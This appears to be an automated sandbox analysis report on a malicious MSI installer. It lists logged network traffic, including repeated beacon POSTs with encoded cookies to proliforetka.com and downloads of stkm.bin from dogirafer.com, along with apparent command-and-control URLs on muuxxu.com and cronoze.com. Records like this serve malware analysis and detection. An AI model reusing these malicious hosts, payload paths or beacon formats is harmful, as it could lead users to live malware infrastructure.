            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: zQQrf4YZ+DXxJIJ2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQfUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: proliforetka.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: zQQrf4YZ+DXxJYJ2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQfUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: proliforetka.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: zQQrf4YZ+DXxJoJ2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQfUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: proliforetka.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: zQQrf4YZ+DXxJ4J2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQfUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: proliforetka.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: zQQrf4YZ+DXxIIJ2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQfUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: proliforetka.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: zQQrf4YZ+DXxIYJ2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQfUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: proliforetka.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: zQQrf4YZ+DXxIoJ2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQfUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: proliforetka.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: zQQrf4YZ+DXxI4J2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQfUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: proliforetka.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: zQQrf4YZ+DXxLIJ2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQfUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: proliforetka.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: zQQrf4YZ+DXxLYJ2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQfUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: proliforetka.comContent-Length: 0Cache-Control: no-cache
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Windows\explorer.exeCode function: 7_2_02F25078 InternetReadFile,7_2_02F25078
            Source: global trafficHTTP traffic detected: GET /files/stkm.bin HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.com
            Source: global trafficHTTP traffic detected: GET /files/stkm.bin HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /files/stkm.bin HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.com
            Source: global trafficDNS traffic detected: DNS query: muuxxu.com
            Source: global trafficDNS traffic detected: DNS query: cronoze.com
            Source: global trafficDNS traffic detected: DNS query: proliforetka.com
            Source: global trafficDNS traffic detected: DNS query: dogirafer.com
            Source: unknownHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: zQQrf4YZ+DX1MtB7wWZOVm6dxbMApErYHkIrgHPcdkrW3ek7S4VyqTt3UE3hInxs8QLBv+1KAJWQTBDNFxD0J2qpovrJJFzxPO2pL5RTiKelSONlVigVM0+zHw3Cx1xAaPbzLSGgFj/sfURN7nGXOUiFEaGhX9p+NroWtkvLZBaSr470b1XyZIY=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: proliforetka.comContent-Length: 92Cache-Control: no-cache
            Source: lavita.msi, MSIC3DE.tmp.2.dr, 42c1d8.msi.2.dr, MSIC2F1.tmp.2.dr, MSIC39F.tmp.2.dr, MSIC35F.tmp.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
            Source: explorer.exe, 00000007.00000000.2402983007.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4606667288.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2402983007.000000000973C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
            Source: lavita.msi, MSIC3DE.tmp.2.dr, 42c1d8.msi.2.dr, MSIC2F1.tmp.2.dr, MSIC39F.tmp.2.dr, MSIC35F.tmp.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
            Source: lavita.msi, MSIC3DE.tmp.2.dr, 42c1d8.msi.2.dr, MSIC2F1.tmp.2.dr, MSIC39F.tmp.2.dr, MSIC35F.tmp.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
            Source: explorer.exe, 00000007.00000000.2402983007.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4606667288.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2402983007.000000000973C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
            Source: lavita.msi, MSIC3DE.tmp.2.dr, 42c1d8.msi.2.dr, MSIC2F1.tmp.2.dr, MSIC39F.tmp.2.dr, MSIC35F.tmp.2.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
            Source: lavita.msi, MSIC3DE.tmp.2.dr, 42c1d8.msi.2.dr, MSIC2F1.tmp.2.dr, MSIC39F.tmp.2.dr, MSIC35F.tmp.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
            Source: explorer.exe, 00000007.00000000.2402983007.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4606667288.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2402983007.000000000973C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
            Source: lavita.msi, MSIC3DE.tmp.2.dr, 42c1d8.msi.2.dr, MSIC2F1.tmp.2.dr, MSIC39F.tmp.2.dr, MSIC35F.tmp.2.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
            Source: explorer.exe, 00000007.00000002.4614759735.000000000C354000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/
            Source: explorer.exe, 00000007.00000002.4614759735.000000000C081000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cabgMW
            Source: explorer.exe, 00000007.00000000.2402983007.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4606667288.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2402983007.000000000973C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
            Source: lavita.msi, MSIC3DE.tmp.2.dr, 42c1d8.msi.2.dr, MSIC2F1.tmp.2.dr, MSIC39F.tmp.2.dr, MSIC35F.tmp.2.drString found in binary or memory: http://ocsp.digicert.com0C
            Source: lavita.msi, MSIC3DE.tmp.2.dr, 42c1d8.msi.2.dr, MSIC2F1.tmp.2.dr, MSIC39F.tmp.2.dr, MSIC35F.tmp.2.drString found in binary or memory: http://ocsp.digicert.com0O
            Source: explorer.exe, 00000007.00000002.4606667288.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2402983007.000000000962B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
            Source: rundll32.exe, 00000004.00000002.4600769204.000001DA7F3A2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4600769204.000001DA7F34D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4600769204.000001DA7F434000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3349191347.000001DA034F3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3349400263.000001DA031D5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4597607083.000001DA031D5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4600769204.000001DA7F3E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4600769204.000001DA7F425000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r11.i.lencr.org/0
            Source: rundll32.exe, 00000004.00000002.4600769204.000001DA7F3A2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4600769204.000001DA7F34D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4600769204.000001DA7F434000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3349191347.000001DA034F3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3349400263.000001DA031D5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4597607083.000001DA031D5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4600769204.000001DA7F3E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4600769204.000001DA7F425000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r11.o.lencr.org0#
            Source: explorer.exe, 00000007.00000000.2402016774.0000000007B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.2399887096.00000000028A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.2402033911.0000000007B60000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
            Source: lavita.msi, MSIC3DE.tmp.2.dr, 42c1d8.msi.2.dr, MSIC2F1.tmp.2.dr, MSIC39F.tmp.2.dr, MSIC35F.tmp.2.drString found in binary or memory: http://t1.symcb.com/ThawtePCA.crl0
            Source: lavita.msi, MSIC3DE.tmp.2.dr, 42c1d8.msi.2.dr, MSIC2F1.tmp.2.dr, MSIC39F.tmp.2.dr, MSIC35F.tmp.2.drString found in binary or memory: http://t2.symcb.com0
            Source: lavita.msi, MSIC3DE.tmp.2.dr, 42c1d8.msi.2.dr, MSIC2F1.tmp.2.dr, MSIC39F.tmp.2.dr, MSIC35F.tmp.2.drString found in binary or memory: http://tl.symcb.com/tl.crl0
            Source: lavita.msi, MSIC3DE.tmp.2.dr, 42c1d8.msi.2.dr, MSIC2F1.tmp.2.dr, MSIC39F.tmp.2.dr, MSIC35F.tmp.2.drString found in binary or memory: http://tl.symcb.com/tl.crt0
            Source: lavita.msi, MSIC3DE.tmp.2.dr, 42c1d8.msi.2.dr, MSIC2F1.tmp.2.dr, MSIC39F.tmp.2.dr, MSIC35F.tmp.2.drString found in binary or memory: http://tl.symcd.com0&
            Source: lavita.msi, MSIC3DE.tmp.2.dr, 42c1d8.msi.2.dr, MSIC2F1.tmp.2.dr, MSIC39F.tmp.2.dr, MSIC35F.tmp.2.drString found in binary or memory: http://www.digicert.com/CPS0
            Source: rundll32.exe, 00000004.00000002.4600769204.000001DA7F3A2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4600769204.000001DA7F34D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4600769204.000001DA7F434000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3349191347.000001DA034F3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3349400263.000001DA031D5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4597607083.000001DA031D5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4600769204.000001DA7F3E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4600769204.000001DA7F425000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2394466415.000001DA7F42A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
            Source: rundll32.exe, 00000004.00000002.4600769204.000001DA7F3A2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4600769204.000001DA7F34D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4600769204.000001DA7F434000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3349191347.000001DA034F3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3349400263.000001DA031D5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4597607083.000001DA031D5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4600769204.000001DA7F3E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4600769204.000001DA7F425000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2394466415.000001DA7F42A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
            Source: explorer.exe, 00000007.00000003.4387068567.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4610617935.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2403423241.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2979103692.00000000099AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
            Source: explorer.exe, 00000007.00000000.2405576453.000000000BFDF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
            Source: explorer.exe, 00000007.00000002.4606667288.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2402983007.000000000962B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
            Source: explorer.exe, 00000007.00000002.4606667288.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2402983007.000000000962B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/I
            Source: explorer.exe, 00000007.00000002.4606667288.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2402983007.000000000973C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
            Source: explorer.exe, 00000007.00000002.4606667288.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2402983007.000000000962B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
            Source: explorer.exe, 00000007.00000000.2401087433.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4603659222.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=435B7A89D7D74BDF801F2DA188906BAF&timeOut=5000&oc
            Source: explorer.exe, 00000007.00000000.2401087433.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4606667288.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4603659222.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2402983007.000000000973C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
            Source: explorer.exe, 00000007.00000002.4606667288.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2402983007.000000000973C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
            Source: explorer.exe, 00000007.00000002.4603659222.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
            Source: explorer.exe, 00000007.00000002.4603659222.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg
            Source: explorer.exe, 00000007.00000002.4603659222.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
            Source: explorer.exe, 00000007.00000002.4603659222.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
            Source: explorer.exe, 00000007.00000000.2401087433.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4603659222.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz
            Source: explorer.exe, 00000007.00000000.2401087433.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4603659222.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz-dark
            Source: rundll32.exe, 00000004.00000002.4600769204.000001DA7F3E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cronoze.com/-
            Source: rundll32.exe, 00000004.00000002.4600769204.000001DA7F3E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cronoze.com/9
            Source: rundll32.exe, 00000004.00000002.4600769204.000001DA7F3E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cronoze.com:8817/
            Source: rundll32.exe, 00000004.00000002.4600769204.000001DA7F3E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cronoze.com:8817/M
            Source: rundll32.exe, 00000004.00000002.4600769204.000001DA7F3A2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4600769204.000001DA7F34D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cronoze.com:8817/intel.php
            Source: rundll32.exe, 00000004.00000002.4600769204.000001DA7F34D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cronoze.com:8817/intel.phpC
            Source: rundll32.exe, 00000004.00000002.4600769204.000001DA7F34D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cronoze.com:8817/intel.phpM
            Source: rundll32.exe, 00000004.00000002.4600769204.000001DA7F3E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cronoze.com:8817/pentium.php
            Source: explorer.exe, 00000007.00000002.4615738228.000000000C3AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.4386958155.000000000C381000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.4387199626.000000000C3A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4587902556.0000000000D99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dogirafer.com/
            Source: explorer.exe, 00000007.00000002.4587902556.0000000000D99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dogirafer.com/est/
            Source: explorer.exe, 00000007.00000003.3457537830.000000000C3C8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dogirafer.com/files/stkm.bin
            Source: explorer.exe, 00000007.00000002.4615831283.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.4387315831.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.4386958155.000000000C381000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.4387199626.000000000C3A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3457537830.000000000C3C8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dogirafer.com/files/stkm.binb
            Source: explorer.exe, 00000007.00000003.3457537830.000000000C3C8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dogirafer.com/files/stkm.binw
            Source: explorer.exe, 00000007.00000002.4615738228.000000000C3AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3556892148.0000000008F60000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3278360370.0000000002FE0000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4601098836.0000000002FBE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.4386958155.000000000C381000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.4387199626.000000000C3A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3496211531.0000000008BA0000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4587902556.0000000000D99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dogirafer.com/test/
            Source: explorer.exe, 00000007.00000003.3556892148.0000000008F60000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: https://dogirafer.com/test/8085467_13561511323361_4058196URLS1https://proliforetka.com/test/775166_4
            Source: explorer.exe, 00000007.00000003.3496211531.0000000008BA0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: https://dogirafer.com/test/8713781_55685573550420_1137939URLS1https://proliforetka.com/test/4803877_
            Source: explorer.exe, 00000007.00000003.3278360370.0000000002FE0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: https://dogirafer.com/test/876227_481825193277_5070988URLS1https://proliforetka.com/test/6581893_513
            Source: explorer.exe, 00000007.00000003.3457537830.000000000C3C8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dogirafer.com/test/stkm.binDS&s
            Source: explorer.exe, 00000007.00000002.4601098836.0000000002FBE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dogirafer.com/test/t/
            Source: explorer.exe, 00000007.00000002.4614759735.000000000C081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2405576453.000000000C048000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com-
            Source: explorer.exe, 00000007.00000002.4603659222.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
            Source: explorer.exe, 00000007.00000000.2401087433.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4603659222.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAzME7S.img
            Source: rundll32.exe, 00000004.00000002.4600769204.000001DA7F3A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://muuxxu.com/
            Source: rundll32.exe, 00000004.00000002.4600769204.000001DA7F3E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://muuxxu.com:8817/
            Source: rundll32.exe, 00000004.00000002.4600769204.000001DA7F3E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://muuxxu.com:8817/e
            Source: rundll32.exe, 00000004.00000002.4600769204.000001DA7F3A2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4600769204.000001DA7F34D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://muuxxu.com:8817/intel.php
            Source: rundll32.exe, 00000004.00000002.4600769204.000001DA7F3A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://muuxxu.com:8817/intel.phpCC
            Source: rundll32.exe, 00000004.00000002.4600769204.000001DA7F3A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://muuxxu.com:8817/intel.phpPC
            Source: rundll32.exe, 00000004.00000002.4600769204.000001DA7F3A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://muuxxu.com:8817/intel.phpom:8817/intel.phpWC
            Source: rundll32.exe, 00000004.00000002.4600769204.000001DA7F3A2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4600769204.000001DA7F34D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://muuxxu.com:8817/pentium.php
            Source: rundll32.exe, 00000004.00000002.4600769204.000001DA7F34D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://muuxxu.com:8817/pentium.phpW
            Source: rundll32.exe, 00000004.00000002.4600769204.000001DA7F3A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://muuxxu.com:8817/pentium.phpgW
